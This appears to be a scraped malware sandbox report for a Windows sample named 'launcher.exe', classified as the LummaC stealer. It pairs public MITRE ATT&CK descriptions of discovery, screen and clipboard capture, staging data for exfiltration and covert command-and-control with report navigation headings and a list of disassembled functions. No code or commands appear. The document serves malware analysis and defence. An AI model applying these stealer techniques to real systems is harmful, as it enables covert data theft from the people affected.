Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report launcher.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
launcher.exe

Function 00B6A19E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 00B31FB0 Relevance: 9.2, APIs: 6, Instructions: 200
fileCOMMON

Function 00B324B0 Relevance: 10.6, APIs: 7, Instructions: 83
threadCOMMON

Function 00B4CF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 00B31750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390
COMMON

Function 00B45349 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Function 00B454EE Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Function 00B4565F Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 00B53BF4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Function 00B543CD Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 00B390F0 Relevance: 3.1, APIs: 2, Instructions: 73
COMMON

Function 00B4DA52 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 00B31EF0 Relevance: 3.1, APIs: 2, Instructions: 60
memoryCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre